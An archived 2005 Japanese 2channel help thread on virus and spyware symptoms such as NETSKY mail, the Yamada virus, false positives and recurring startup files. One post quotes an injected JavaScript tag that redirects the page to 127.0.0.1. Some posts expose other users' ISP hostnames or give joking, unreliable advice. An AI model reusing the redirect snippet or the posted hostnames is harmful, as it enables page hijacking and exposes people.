そうですけど再インスコ以外に方法ないですか?
189名無しさん@お腹いっぱい。:2005/05/12(木) 17:00:53
>>188
ありますが、自力で調べられないようなら、再インストールが確実で早いです。
190名無しさん@お腹いっぱい。:2005/05/12(木) 17:04:41
>>181
室濃い 死ね
191181:2005/05/12(木) 17:16:39
トロイのソフトとかですか?
192181:2005/05/12(木) 17:17:57
Swat ITってアンチトロイですか?
193名無しさん@お腹いっぱい。:2005/05/12(木) 17:18:35
googkleに感染してしまったみたいです…
ワクチン、または対処法教えてください
お願いします。
194名無しさん@お腹いっぱい。:2005/05/12(木) 17:29:38
こんにちは
WEBサイトで自分のメルアドを公開している者ですが 最近こういうメールがくるようになりました

件名 failure notice
宛先 MAILER-DAEMON@****.co.jp

Hi. This is the qmail-send program at jip.co.jp.
I'm afraid I wasn't able to deliver your message to the following addresses.
This is a permanent error; I've given up. Sorry it didn't work out.

<****@****.co.jp>:
Sorry, I couldn't find any host named ******.co.jp. (#5.1.2)
--- Below this line is a copy of the message.

このあと 

TVqQAAMAAAAEAAAA//8AALgAAAA といった文字が大量に入っています。

****@****.co.jp の人にメールを出したことはないので、MAILER-DAEMONで帰ってくることはありえないのですが
これは****@****.co.jp の人がウイルスに感染しているということでしょうか? 該当するウイルスがあったら教えてください。


195名無しさん@お腹いっぱい。:2005/05/12(木) 17:58:32
【使用OS】 XPSP2
【WindowsUpdateしてるか】 している
【AntiVirusは何を使っているか】 ウィルスセキュリティ
【ちゃんとUpdateしてるか】 している
【スキャンした結果(ウイルス名・発見場所)】 全ファイルスキャンしたけど検出されず 同名ファイルは発見した。
【別のオンラインスキャンしたならその結果は】 シマンテックのオンラインスキャンでは検出されず。
【症状を具体的に、分かる限りすべて書く】tcpsvcs.exeというプロセスが起動直後からCPUを100%使用して、重くなる。不審な通信は行われていない模様(通信ランプを見る限り。)
【何をしたらそんなことになったのか】 気がついたらなっていた
【これまでにとった措置】 タスクマネージャのプロセスの終了で終わらせていた。ファイルの方も削除してみたがすぐに復活している。
196名無しさん@お腹いっぱい。:2005/05/12(木) 18:02:24
>>193
「googkleに感染する」という表現は間違ってる気がするが・・。
とりあえずスキャン。
197名無しさん@お腹いっぱい。:2005/05/12(木) 18:06:04
【その他の質問】 tcpsvcs.exeで検索したところシマンテックのスパイウェアの頁でレジストリをいじられてたら消すように、と書いてありましたが
初心者なのでやり方がわからないのと間違っていじってしまわないかと不安です。
それとウィルスセキュリティの更新が実家の親のPCで使っていたノートンに比べてとても少なく不安です。
198名無しさん@お腹いっぱい。:2005/05/12(木) 18:35:28
199名無しさん@お腹いっぱい。:2005/05/12(木) 18:46:27
ウィルスが検出されたっぽいです。

【使用OS】 XPSP2
【WindowsUpdateしてるか】 しています
【AntiVirusは何を使っているか】 ウィルスバスター2005無料版
【ちゃんとUpdateしてるか】 しています
【スキャンした結果(ウイルス名・発見場所)】 全ファイルスキャン
【別のオンラインスキャンしたならその結果は】 シマンテックのオンラインスキャンで9つ検出…
                           ウィルスバスターなら何も検出されませんでした。



C:\Documents and Settings\●●●●(←名前)\Local Settings\Temporary Internet Files\Content.IE5\M1SBQXU5\comic[1].htm は Unix.Penguin に感染しています。
C:\Documents and Settings\●●●●\Local Settings\Temporary Internet Files\Content.IE5\8RVFISPH\l100[5].htm は Unix.Penguin に感染しています。
C:\Documents and Settings\●●●●\Application Data\katjusha\log\pc8.2ch.net\sec\1114223469.dat は VBS.LoveLetter.A に感染しています。
C:\Documents and Settings\●●●●\Application Data\katjusha\log\pc8.2ch.net\sec\1114249250.dat は VBS.LoveLetter.A に感染しています。
C:\Documents and Settings\●●●●\Application Data\katjusha\log\pc8.2ch.net\pcqa\1112493137.dat は Unix.Penguin に感染しています。
C:\Documents and Settings\●●●●\Application Data\katjusha\log\etc4.2ch.net\wcomic\1112697839.dat は Unix.Penguin に感染しています。
C:\Documents and Settings\●●●●\Application Data\katjusha\log\etc4.2ch.net\wcomic\1113139376.dat は Unix.Penguin に感染しています。
C:\Documents and Settings\●●●●\Application Data\katjusha\log\etc4.2ch.net\wcomic\1114712291.dat は Unix.Penguin に感染しています。
C:\Documents and Settings\●●●●\Application Data\katjusha\log\etc4.2ch.net\wcomic\1115736810.dat は Unix.Penguin に感染しています。

どこから何を消せばよいのでしょうか…?
200名無しさん@お腹いっぱい。:2005/05/12(木) 18:50:51
>>199
誤検出。心配なし。
気になるなら、インターネット一時ファイルを削除する。
201名無しさん@お腹いっぱい。:2005/05/12(木) 18:52:13
>>200
これが噂に聞く語検出でしたか。
びっくりしました…
ありがとうございました。安心しました。
202名無しさん@お腹いっぱい。:2005/05/12(木) 18:52:39
>199
インターネットオプションで一時ファイルを削除
後は放置で問題なし
203名無しさん@お腹いっぱい。:2005/05/12(木) 18:55:55
>>202
それもやってみます。
どうもありがとうございました。
204名無しさん@お腹いっぱい。:2005/05/12(木) 18:57:23
>>203
いや・・一緒やん
205名無しさん@お腹いっぱい。:2005/05/12(木) 18:58:08
http://p2176-ipad06hiraide.tochigi.ocn.ne.jp/

wwwwwwwwwwwwっうぇwwwwwwwwwwww
wおkwwwうはっwwwっおkwwwっうぇ
っうぇwwwwwwwwwwwwうはっwwwwwwwwww
206名無しさん@お腹いっぱい。:2005/05/12(木) 18:59:54
>>204
いや、一応答えていただいたのでお礼を言わなければなぁ、と思ったもので…
紛らわしくてすみません。
207名無しさん@お腹いっぱい。:2005/05/12(木) 19:17:34
>>194
宛先がMAILER-DAEMON@****.co.jpなのか?
送信者がMAILER-DAEMON@****.co.jpじゃなくて?
208名無しさん@お腹いっぱい。:2005/05/12(木) 19:19:16
209208:2005/05/12(木) 19:21:03
スマソ先走った・・。

>>194
どっちにしろその手のメールは削除した方がいいと思うぞ。
210182:2005/05/12(木) 19:29:17
【使用OS】WindowsXP Home SP2
【WindowsUpdateしてるか】している
【AntiVirusは何を使っているか】ウィルスバスター
【ちゃんとUpdateしてるか】している
【スキャンした結果(ウイルス名・発見場所)】見つからず
【症状を具体的に、分かる限りすべて書く】C:\WINDOWS\system32 に update5440791.log という名前の10GBのテキストファイルができる
                          削除しても数分後にまた作成されている。
【何をしたらそんなことになったのか】ダウンロードしたなにかのexeを実行したかも。
【これまでにとった措置】削除→作成→削除→・・・のいたちごっこ
【その他の質問】
211名無しさん@お腹いっぱい。:2005/05/12(木) 19:54:25
>>210
ny使いの可能性が高い希ガス
212名無しさん@お腹いっぱい。:2005/05/12(木) 20:00:40
>>211
jpg作るやつはノートンが対応してるみたいだけど、logのはどうなったのかね〜?
って、なんで俺はこんなこと知ってんだw
213名無しさん@お腹いっぱい。:2005/05/12(木) 20:21:07
当方XPで今日NETSKYに感染しちゃったんですが
ウィルスバスターで駆除しても重いままです
これってリカバリするしかないんですかね?
214名無しさん@お腹いっぱい。:2005/05/12(木) 20:29:35
>>213
他に原因があるのでは?
215名無しさん@お腹いっぱい。:2005/05/12(木) 21:29:24
198 名前: みうなぎφ ★ [sage] 投稿日: 2005/05/12(木) 21:26:53 ID:???
〜2chをIE等で見ていると127.0.0.1に飛ばされる件について〜 
 現在2chのほぼ全域(2chトップ・スレ一覧)に埋め込まれているlivedoorのブログ(以下乙部ブログ)に 
  <script type="text/javascript" language="JavaScript">w=window;if(w.parent != w.self) { w.parent.location = 'http://127.0.0.1/'; }</script><br /> 
 というタグが埋め込まれているため、自動的に127.0.0.1に飛ばされるようになっています。 
 この問題はjavascriptを切る事によって仮解決します 
 また、127.0.0.1に飛ばされた時にハードディスク内のファイルが表示される場合、 
 山田ウィルスに感染している恐れがあるので確認してみてください。 

216名無しさん@お腹いっぱい。:2005/05/12(木) 22:39:48
なんで2ch行く時にjavascript入れてるやつがいるんだ?
必要ないじゃん。
217181:2005/05/13(金) 01:19:03
とりあえずやってみます。ありがとうございます。
218名無しさん@お腹いっぱい。:2005/05/13(金) 02:15:18
http://pc8.2ch.net/test/read.cgi/sec/1114827665/
↑にも書きましたものです。

negativebeats.comってとこでmp3をダウンロードしようとしたら 、
yoursitebarってウィルスらしきものが…。ポップアップが毎日出ます。
ノートン2003を更新しててもダメです。

助けてください。。
219名無しさん@お腹いっぱい。:2005/05/13(金) 04:14:35
>>218
スパイウェアは調べた?
220名無しさん@お腹いっぱい。:2005/05/13(金) 04:18:26
>>218
yoursitebarでぐぐったら色々出てきたけど
ttp://www.shareedge.com/spywareguide/product_show.php?id=974
>>219の言うとおり、スパイウェアだね
221名無しさん@お腹いっぱい。:2005/05/13(金) 04:48:49
どこで質問してよいのかわからないので力になってくれる方いたらお願いします。

ここ1週間ほどPCを立ち上げると何も上げていないうちに小さいウィンドウでIEが立ち上がり
サーバが見つかりませんと出ます。
その後普通にIE立ち上げると別ウィンドウで海外のポルノサイトが3つくらい開くのですが
どう対処したらいいでしょうか?

今まで何かあると嫌なのでこのPCでアダルトサイトなどは見たことはなく、nyやシェアも
やってないのですが、たまに様子を見つつ(他の人の反応見つつ)2chなどでzipやmp3ファイル
はダウンロードしたことはあります。

あと、スパムメールがものすごく来るのも関係あるのでしょうか?(3日ほっとくと300件以上たまってます)
ノートンを何度かかけているのですが特に何も引っかからないのです・・。
222名無しさん@お腹いっぱい。:2005/05/13(金) 05:01:48
>>221
君もスパイウェア検索してみようか
223221:2005/05/13(金) 06:00:06
ありがとうございます
セキュリティ板にAd-AwareSE用のスレッドあるんですけど、なんか空気が変なのでこっちで
質問します。
Ad-AwareSEをDLしてスキャンかけたのですが終了時のファイルが
141/141objectsもあるんですが、とりあえず全部チェック入れて消去しちゃっておkでしょうか?
224名無しさん@お腹いっぱい。:2005/05/13(金) 06:59:45
ここはウィルススレだっつーの馬鹿
225名無しさん@お腹いっぱい。:2005/05/13(金) 07:10:44
>>223
141個っつっても多分、ほとんどがMRUじゃないかな
Regseekerじゃあるまいし、全消しでも無問題
226名無しさん@お腹いっぱい。:2005/05/13(金) 07:11:45
全部消していいでしょうかって。
その中に良くないのがふくまれてる可能性も
皆無ではないことくらいはわかるよな?

そもそもそんな相談の仕方されても
あんたのスキャン結果に何が出てるかこちらはわからないので。

まあ大抵どうってことないけど、それぞれを興味を持ってみる習慣を持たないと、
いつまで経っても知識のレベルが上がりませんよ。何ごとも。
227名無しさん@お腹いっぱい。:2005/05/13(金) 07:58:26
今まで一緒にいた人たちがエンジニアやらプログラマやらで
無知のままホイホイPCもらってたので・・
いかに自分が無防備だかわかりました。
勉強します、みなさんありがとう。
228名無しさん@お腹いっぱい。:2005/05/13(金) 12:46:52
今までVB使ってたけど、先日の騒ぎでノートンに乗り換えようかと
体験版を試してるんですが、間違えてギコを「常に遮断」って
やっちゃいました
どうしたら元に戻せるかどうしてもわかりません
どなたか教えていただけませんか?
229名無しさん@お腹いっぱい。:2005/05/13(金) 13:03:41
>218
>219
ありがとうございます。スパイウェアらしいですね。
教えていただいたX-Cleanerで除去してみます。
230名無しさん@お腹いっぱい。:2005/05/13(金) 13:07:13
>>228
ファイヤーウォール → プログラム制御でギコを常に許可に汁。製品のヘルプも参照。
231228:2005/05/13(金) 13:13:03
>>230
おかげで無事解決出来ました
ありがとうございました



関係無いけどノートンて重いですね
232名無しさん@お腹いっぱい。:2005/05/13(金) 13:37:22
>>231
重いなりの仕事はやってる。
常駐アプリやサービスをできるだけ減らすとかして工夫する。
233231:2005/05/13(金) 14:54:06
>>232
なるほど、そういう考え方もアリっすね<<重いなりの仕事

とりあえず試用期間目一杯使って見極めます
234名無しさん@お腹いっぱい。:2005/05/13(金) 15:39:45
携帯から失礼します。
今まで、windowsにログインするときには
あえてパスワードを設定していなかったのですが、
今朝立ち上げようとしたらパスワード要求の画面になりました。

パスワードのヒントはpetとなっており、
全く覚えがありません。

13日の金曜日なので、
今日発病にプログラムされたウィルスか何かかと
思ったのですが、
ログインできないためネットに繋ぐこともできず、
調べられません…

どなたか調べて頂けないでしょうか。
また、同じ症状の方はいらっしゃいませんか?
235名無しさん@お腹いっぱい。:2005/05/13(金) 15:44:26
>>234
2ちゃんに書き込めるんなら調べられるだろうよ。
なんかあったらすぐにウィルスのせいだと思うのやめた方がいいよ。
236235:2005/05/13(金) 15:47:53
237名無しさん@お腹いっぱい。:2005/05/13(金) 16:18:57
>>235,236

アドバイスありがとうございますm(_ _)m

ezwebでウィルスやパソコンetcをキーワードに検索はしたのですが、
それらしいものが見つけられず、
2chに助けを求めてしまいました。

imodeではできると聞いていましたが、
ezで2chができるかさえこれまで知らなかった未熟者です(汗

今までは様々な不具合があっても、
ウィルスではなく自分の不手際やハードの問題でしたので
今回ももちろんまずそれを疑い、
何とかいろいろ試してみましたが、
本当にお手上げだったので最後にウィルスを
考えた次第です。

236のサイトを熟読してみます。
ありがとうございました。
238名無しさん@お腹いっぱい。:2005/05/13(金) 16:19:53
>>235はエボシ
239名無しさん@お腹いっぱい。:2005/05/13(金) 17:17:47
ここ4,5日で1日に3、4通知らないアドレスからNETSKYが入ったメールを受け取ります。
あとDAEMONメールも来るようになりました。
プロバイダはniftyでOSはXPウィルスソフトはウィルスバスターです。
今まで一度もこんなことが無かったので怖いのですが
原因は自分のアドレスを知ってる人が感染したと考えればいいでしょうか?
NETSKYは受信したメールを開いても添付ファイルを開かなければ大丈夫なんでしょうか?
また、もし感染してた場合どんな事が起こりますか?

すいませんがどなたかアドバイスお願いします。
240名無しさん@お腹いっぱい。:2005/05/13(金) 17:34:10
>>239
あなたのアドレスを知ってる人が感染したんだろうね。
Windows Updateしてないと、セキュリティホール突かれて受信即感染もありうるよ。
241240:2005/05/13(金) 17:35:22
>>239
【差出人】WORM_NETSKY【詐称】
http://pc8.2ch.net/test/read.cgi/sec/1080741342/も参照
242名無しさん@お腹いっぱい。:2005/05/13(金) 17:38:28
とあるサイトに行ったところ急にウイルス警報が鳴り、PCのハードデスクアクセスランプ
が光りっぱなしになりました。
駆除もできず、ランプも光りっぱなしなので再セットアップを試みたのですが、
再セットアップ用CDロムすら受け付けず、再セットアップすらできませんでした。
こんな怖いウイルスあるのですか?
確か種類はワーム系だったように記憶しているのですが・・・
ちなみに、今は別のPCでアクセスしてます。

ご意見をお聞かせください。
243名無しさん@お腹いっぱい。:2005/05/13(金) 17:40:26
>>242
お願いだからスキャンしてよ。オンラインスキャンでもいいよ。
244名無しさん@お腹いっぱい。:2005/05/13(金) 17:41:47
>>242
ご意見
CDブートしてインストールしろよ
245名無しさん@お腹いっぱい。:2005/05/13(金) 17:44:15
>>240-241
ありがとうございます。
updateはこまめにやっているので感染はしてないと思います。
というか、感染していない事を祈るばかりです・・・
246名無しさん@お腹いっぱい。:2005/05/13(金) 17:52:45
>>243>>244
ご返答ありがとうございます。
そのサイトに足を踏み入れた時点でジーとPCのハードデスクアクセスランプ
が光りっぱなしになってしまい、ネット機能はもちろんすべての機能が使用できなく
なってしまいました。できたのは電源を切るくらいです。
(ですからオンラインスキャンもできません。)
再度立ち上げてもそのジーの状態が続いていますし・・・
そこで再セットアップのCDロムを入れたのですが受け付けない(読み込まない)
のです。ハードデスクがウイルスに破壊されたのでしょうか?
OSはMEなんですが・・・

CDブート・・・?
247名無しさん@お腹いっぱい。:2005/05/13(金) 18:01:26
ここで解析してもらいたいのですが、うpろだにウイルスUPするのはやばいですか?
きちんとコメント欄で警告してパス付ZIPでうpすれば問題ないかな?
248名無しさん@お腹いっぱい。:2005/05/13(金) 18:09:39
>>247
何でパス付ZIPとか知ってるのに解析頼むんだ?
初心者には見えないが
249名無しさん@お腹いっぱい。:2005/05/13(金) 18:10:32
>>247
ν速にカエレ(・∀・)!
250名無しさん@お腹いっぱい。:2005/05/13(金) 18:17:15
>>248-249
聞く場所間違えますた。スマソ
251トラックバック ★:2005/05/13(金) 21:09:47
【トラックバック来たよ】 (ver. 0.11)
[タイトル] もの凄い勢いで誰かが質問に答えるスレ14766
[発ブログ] 初心者の質問@2ch掲示板
http://etc3.2ch.net/test/read.cgi/qa/1115973339/l50
( ref= http://etc3.2ch.net/test/read.cgi/qa/1115973339/l50 )

[=要約=]
調べるのがめんどくさい初心者はなんでもかいとけ!
知ってたら即、答えるし、知らんかったら知らんと書く。
検索なんかクソでも喰っとけ!
教えて君以外は逝ってヨシ!

【鉄の掟】
一、かぶっても泣かない。
一、出された質問は残さず答える。
一、マンモス村田のギャグには大爆笑する。

■質問者へ
なかなか回答がこない場合は「<a href="../test/read.cgi/qa/1115973339/2" target="_blank">>>2</a>」のように質問を書いた場所の
左側の番号を半角で書き込んで回答を催促してみましょう。

■参考
本スレURL保存所6        ←スレを立てたら報告はこちら
http://jbbs.livedoor.jp/bbs/read.cgi/computer/490/1108136298/
もの質外部避難所12      ←鯖がdjときはこちらに集合
http://jbbs.livedoor.jp/bbs/read.cgi/computer/490/1101364883/
物質避難所 3テント目
http://etc3.2ch.net/test/read.cgi/qa/1105598185/


252182:2005/05/14(土) 01:30:15
すいませんが 
>>210
の質問に答えていただけないでしょうか?
HDの空きが数GBになってしまってせっぱつまってます。
よろしくご教示ください。
253名無しさん@お腹いっぱい。:2005/05/14(土) 01:33:11
>>252
スパイウェアは調べたの?やってだめだったら
コントロールパネル→システム→システム復元を無効
にしてもう一度削除してみる。
254218:2005/05/14(土) 01:33:37
yoursitebarに見せかけてるだけで
どうもyoursitebaじゃないっぽいです。。
いまだにポップアップ出てきます。
素人じゃ説明付きにくいです。
X-Cleanerもやったし。ノートン先生もまったく反応しないし。。

どなたかウィルス&スパイウェアに詳しくて
回復力に自信のある方、
negativebeats.comでmp3をダウンロードして
このにかかっていただけません?
なんか言ってること回し者っぽいですけど。

でもなんか変ですよ、このウィルスだかスパイウェアだかは。。。
255名無しさん@お腹いっぱい。:2005/05/14(土) 01:38:57
256182:2005/05/14(土) 01:49:49
>>253
Spybotでチェックしてスパイウェアはありませんでした。
システム復元を無効にして削除しましたが、やはり再び作成されてしまいます。
他に対処法はありませんか?
257218:2005/05/14(土) 01:49:56
もしかしてラバソフトのアドアウェアですかね?
スパイウェアブラスターとスパイボットとアドアウェア
3つとも更新して、後者2つは自分でスキャンして使ってます。
258名無しさん@お腹いっぱい。:2005/05/14(土) 01:53:24
>>257
Ad-awareSEになってるか?
259253,255:2005/05/14(土) 01:54:36
>>256
セーフモードはやってみた?
260253,255:2005/05/14(土) 01:57:43
261182:2005/05/14(土) 01:58:28
>>259
やってみます。
返信ありがとうございます。
262253,255:2005/05/14(土) 02:00:39
>>257
感染してみた。そのあとAd-awareSEでフルスキャン。
問題ないよ
263182:2005/05/14(土) 02:35:56
>>259
Ad-awareSEをインストールして、フルチェックしました。
セーフモードで削除もしました。
しかし、まだファイルが作成されてます・・・
264253,255:2005/05/14(土) 02:41:08
>>263
ウイルスバスターは軽度の症状にはフルスキャンかけても発見できない場合があるから、
C:\WINDOWS\system32 update5440791.logのプロパティ開いて、
直接ウイルススキャンすると発見できる場合がある。
もしもあったらプログラムの追加と削除で変なアプリが無いか探してみな!
265253,255:2005/05/14(土) 02:42:37
もう寝る
266名無しさん@お腹いっぱい。:2005/05/14(土) 02:47:55
267名無しさん@お腹いっぱい。:2005/05/14(土) 03:26:09
ThePenis
268名無しさん@お腹いっぱい。:2005/05/14(土) 05:54:26
さっき、Windows2000で作業してたら、見慣れない

WINLOGON.EXEというのがけっこうなCPUとメモリを消費して鎮座していました。
さっそく検索してみると、ウイルスの可能性が・・・
大文字というのも激しく気になる。

レジストリを見る分にはウィルスの感染は無いとは思うんですが、
元々正規のやつもあるらいしので、わけがわかりません。

これって、正規版でも突然立ち上がったりするんでしょうか?
269名無しさん@お腹いっぱい。:2005/05/14(土) 11:16:18
270名無しさん@お腹いっぱい。:2005/05/14(土) 12:13:28
「著作権侵害だ、自業自得」とHDDの全ファイルを消去するウイルス
ttp://news.goo.ne.jp/news/internet/it/20050514/iw2005051403-internet.html

スペインのPanda Softwareは11日、トロイの木馬型ウイルス「Whiter.F」を警告した。
脅威レベルは4段階中、下から2番目の“Low”だが、ダメージ度は最も高く評価されている。
Whiter.Fに感染すると、まずCドライブの直下にWXPと呼ばれるテキストファイルが生成される。
このファイルには「You did a piracy, you deserve it(お前は著作権を侵害した、自業自得だ)」と記載されている。
続いて、HDDに保存されたファイルを全てこのファイルに置き換えた上で、
ファイルを全て削除する。このため、感染したPCは機能を停止してしまう。
さらに、ユーザーがツールを使用してHDDの修復を試みても、
置き換えられたファイルのみが回復され、元々のデータを復旧することは不可能だという。
271名無しさん@お腹いっぱい。:2005/05/14(土) 15:29:03
PCを起動していると突然黒画面になり

WARNING!
YOU'RE IN DANGER
あと英語〜〜〜

中略

英語〜〜

となったのですが、コレもウィルスなのでしょうか?
検索してもいまいちでてきません。
272名無しさん@お腹いっぱい。:2005/05/14(土) 15:47:53
273名無しさん@お腹いっぱい。:2005/05/14(土) 15:58:37
>>272
スパイウェアですか!
Spybotとかで削除できそうですね。
ありがとうございます。
274名無しさん@お腹いっぱい。:2005/05/14(土) 16:03:15
>>271
ttp://www.higaitaisaku.com/

このページの上のメニューのHJT DBをクリック

smart-securityで検索

1件該当するものがヒットする
275名無しさん@お腹いっぱい。:2005/05/14(土) 16:14:58
>>274
ありがとうございますorz
276名無しさん@お腹いっぱい。:2005/05/14(土) 16:16:43
>>275
あのさ、その壁紙になったということは今まで
スパイウェアに感染していたんだろ。
277名無しさん@お腹いっぱい。:2005/05/14(土) 16:17:59
ガキは黙ってろや
     ∧_∧        |
     ( ´_ゝ`)       ||
   /⌒    ⌒ヽ     |||
  / _イ    /⌒\    ||||
  (___つ/     \   |||||
    / /   イ\   \  /\
    |     /|   \  \∧ │ ☆
    \_/  |     \<  >/
       │  |    ☆ \∨⌒ヽ
       /  ノ     ヾ/ ´;゚;ё;゚;)
      /  /        |>>276/
     丿 /        | /| |
    (  (__        // | |
     ヽ_ノ       U  .U
278名無しさん@お腹いっぱい。:2005/05/14(土) 16:24:41
>>268>>271
おまいら とりあえず>>1
279名無しさん@お腹いっぱい。:2005/05/14(土) 16:27:47
>>268
ttp://www.nai.com/japan/security/virS2003.asp?v=W32/Spybot.worm.lz

>・WINDOWS SYSTEM32ディレクトリに、24,064バイトのwinlogin.exeファイル(注:winlogon.exeは
>正規のWindowsファイルです)、および43,520バイトのyuetyutr.dllファイルが存在します。
280名無しさん@お腹いっぱい。:2005/05/14(土) 16:31:24
http://ntgnma039180.gnma.nt.adsl.ppp.infoweb.ne.jp/
wwwwwwwwwwwwwww
wwwwwwwおkwww
wwwwwwwwwwwwwww
おkwww
っっうぇっうぇwwwwwwwwwwwwwwwwうはっwww
281名無しさん@お腹いっぱい。:2005/05/14(土) 16:46:32
もしかして、これはやばいすか?

【Intel】 ハイパースレッディングに深刻な脆弱性 【入ってる?】 
http://news19.2ch.net/test/read.cgi/newsplus/1116047559/
282名無しさん@お腹いっぱい。:2005/05/14(土) 19:05:34
山田ウイルスに感染したかどうかどうやったらわかるの?
詳しい人、教えて。
症状がわからない。

283名無しさん@お腹いっぱい。:2005/05/14(土) 19:09:08
山田という人に逢いやすくなる
284名無しさん@お腹いっぱい。:2005/05/14(土) 19:13:01
>>282
http://127.0.0.1:80/~ss.jpg
       ↑デスクトップが映ったら阿寒
285名無しさん@お腹いっぱい。:2005/05/14(土) 19:26:45
ウイルスセキュリティ2005EX入れてフレッツの速度計測すると入れてない状態よりも
30Mbpsも低くなりました。 
速度が犠牲にならない対策ソフトはありませんでしょうか
286名無しさん@お腹いっぱい。:2005/05/14(土) 19:50:27
>>285
そんな便利なモンがあったらみんな使ってる。
セキュリティと利便性とはトレードオフなんだから
ある程度は諦めれ。

大体、速度計測で何十Mbps出たところで事実上10Mbpsあれば
普通に使ってる分には充分だし。P2Pでも使ってれば別だけど。
287名無しさん@お腹いっぱい。:2005/05/14(土) 20:40:17
>>270
これ、同様のウイルスもっと昔からあるよね。
288名無しさん@お腹いっぱい。:2005/05/14(土) 21:36:43
自分のIPアドレスってどうやったらわかるんですか?
289名無しさん@お腹いっぱい。:2005/05/14(土) 21:42:52
>>288
WindowsXPの場合は「スタート」→「すべてのプログラム」→「アクセサリ」→「コマンドプロンプト」でカーソルの位置からそのままipconfigと入力して[Enter]キー。
290名無しさん@お腹いっぱい。:2005/05/14(土) 21:51:26
>>289
ありがとうございました。山田ウイルスが気になって・・・
291名無しさん@お腹いっぱい。:2005/05/14(土) 22:02:29
>>290
自分のIPと山田ウイルスとなんの関係が?
感染してるか知りたいんだったらhttp://127.0.0.1/かhttp://localhost/で
ブラウザからアクセス出来るか調べりゃいいし。
292名無しさん@お腹いっぱい。:2005/05/14(土) 22:17:14
>>291
自分と同じISPの山田の書き込みを見るたびビクついてたんで
検索してみようと思ってんですけど・・・関係なかったんですか・・・orz
一応そこにアクセスしてみたんですが何も表示されなかったんで
一安心です・・・ありがとうございました。
293名無しさん@お腹いっぱい。:2005/05/14(土) 22:32:19
294名無しさん@お腹いっぱい。:2005/05/14(土) 22:45:05
NETSKYに感染して
ウィルスバスターで駆除したんですが
でも重たかったんでリカバリ
まだ重たいorz
で今日ウィルス検索しても何も検出せず
スパイウェアもなし
しかもメールの送受信もなぜかできない・・・
あと送受信しようとして失敗したときに
Outlook Express閉じるといっそう重たくなるんです・・・
OSはXP、セキュリティソフトはウィルスバスターです
295名無しさん@お腹いっぱい。:2005/05/15(日) 01:16:33
ウイルスバスターは初期設定の関係でNortonの三倍は重いと知り合いがいってました。
296名無しさん@お腹いっぱい。:2005/05/15(日) 01:52:01
>>295
おまいはその知り合いの言うことは全て信じるんだな。
297名無しさん@お腹いっぱい。:2005/05/15(日) 09:33:45
>>291
「サーバーが見つかりません」って出れば感染してないの?
http://localhost/の方を試したが
298名無しさん@お腹いっぱい。:2005/05/15(日) 09:47:12
>>297
おーい!
LOCALHOSTを偽装したサイトもあるから、
あんま気軽にurl踏むのやめれ。
299名無しさん@お腹いっぱい。:2005/05/15(日) 09:54:53
たとえば

  localhost.de lokalhost.info lokalhost.de locaihost

とか。間違って踏んだら地獄見ますし、紹介してる人も
間違って打ったら、もろブラクササイト誘導になるので
気をつけてください。
300名無しさん@お腹いっぱい。:2005/05/15(日) 12:43:47
Msconfogで開いたシステム構成ユーティリティで、チェック外しても起動時に、
いつのまにまた元に戻っちゃう物は、どうやって消すのでしょうか?
301名無しさん@お腹いっぱい。:2005/05/15(日) 13:26:47
>>300
そいつを復活させてる大元から消す
つか、具体的に何が復活するのさ?
302名無しさん@お腹いっぱい。:2005/05/15(日) 13:43:53
>300
回答ありがとうございます。
p2pnetwork.exeとかいうやつです。
やたらと、ネットワークに繋がろうとしてくれてます・・・

消したいのですが、コマンド欄にはファイル名だけで・・・
場所欄のHKCH\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
って、どこになるのでしょう?
303名無しさん@お腹いっぱい。:2005/05/15(日) 14:24:23
プロセスに「xxlbou.exe」ってのがあるんだけど、これってウイルスなの?
終了するとまた別の名前で起動するのだが、これって何?
念のためファイルのバージョン情報をば
ファイルバージョン:1, 0, 7, 1
会社名:TODO: <Company name>
言語:英語 (米国)
製品バージョン:0, 0, 7, 0
製品名:TODO: <Product name>
304名無しさん@お腹いっぱい。:2005/05/15(日) 15:46:59
W32.HLLW.Purolは削除しても良いんですか?
305名無しさん@お腹いっぱい。:2005/05/15(日) 15:50:49
>>302
まあ、特に実害が無いなら放っておいていいんじゃないの?
気になるなら、ウイルス対策ソフトとファイアーウォールソフト入れなさい。
306名無しさん@お腹いっぱい。:2005/05/15(日) 19:27:30
ウイルス対策ソフトはどれが一番優れてるの?
有名どころはノートン、ウイルスバスター、マカフィーあたりかな?
玄人の方、教えて下さい。
307名無しさん@お腹いっぱい。:2005/05/15(日) 19:35:35
ウィルスセキュリティ2005EX をおすすめする。安いヨ
308名無しさん@お腹いっぱい。:2005/05/15(日) 19:38:45
>>306
何も入れないのをお奨め
完璧だからね w
309名無しさん@お腹いっぱい。:2005/05/15(日) 19:48:32
73 名前: 動け動けウゴウゴ2ちゃんねる 投稿日: 2005/05/15(日) 19:29:59 ID:2QSt/S9K0
質問です。 
ウイルス対策ソフトは一般的にどれが一番優れてるの? 
有名どころはノートン、ウイルスバスター、マカフィーあたりかな? 
玄人の方、教えて下さい。 

310 :2005/05/15(日) 19:50:14
>>307
サンクス!

>>308
なわけないでしょ!からかわないで!!
311 :2005/05/15(日) 19:52:39
>>309
うん、それ自分だけど・・・
複数のスレで書き込んじゃいけないの?
別に新スレ立ててるわけじゃないんだし。
312名無しさん@お腹いっぱい。:2005/05/15(日) 20:00:19
>>311
マルチポストはやめましょう
ttp://www.ippo.ne.jp/g/53.html
313名無しさん@お腹いっぱい。:2005/05/15(日) 20:31:33
結果マルチになってしまいますが
別スレで怒られたのでこっちで質問します
初心者板でもスルーされてしまったので何卒お願いします

先程ネットやってたら画面に血しぶきが出てきて
「キャー」という悲鳴と共に「ぬるぽ」という文字が出てきて
電源切ったら再起動出来ない状態になりました
これって前に流行ったキンタマってヤツですか?
今流行りの山田ウィルスとかいうヤツもこんな風になるんでしょうか?

どっちにしても気付かずになんか食らってたんだと思うんですけど
血しぶきが飛ぶタイミングってなんなんですか?
どういう条件が揃うと血飛沫に至るとかってあるんですか?
それともランダムで血飛沫なんでしょうか?
あと、山田はわかんないですけどキンタマだと
HDの中身をぬるぽに書き換えられてしまうようですが
それを回避する方法ってありますかね?
厨質ですみませんが、どなたかよろしくお願いします
314名無しさん@お腹いっぱい。:2005/05/15(日) 20:33:46
315名無しさん@お腹いっぱい。:2005/05/15(日) 23:49:42
【使用OS】 win98
【WindowsUpdateしてるか】はい
【AntiVirusは何を使っているか】使っていません
【ちゃんとUpdateしてるか】 いいえ
【スキャンした結果(ウイルス名・発見場所)】 ttp://www2.strangeworld.org/uedakana/
【別のオンラインスキャンしたならその結果は】 していません
【症状を具体的に、分かる限りすべて書く】 ブラクラのようによくわからない窓が開いてきて
                    (たぶんメール関係)そしてOutlookExpress
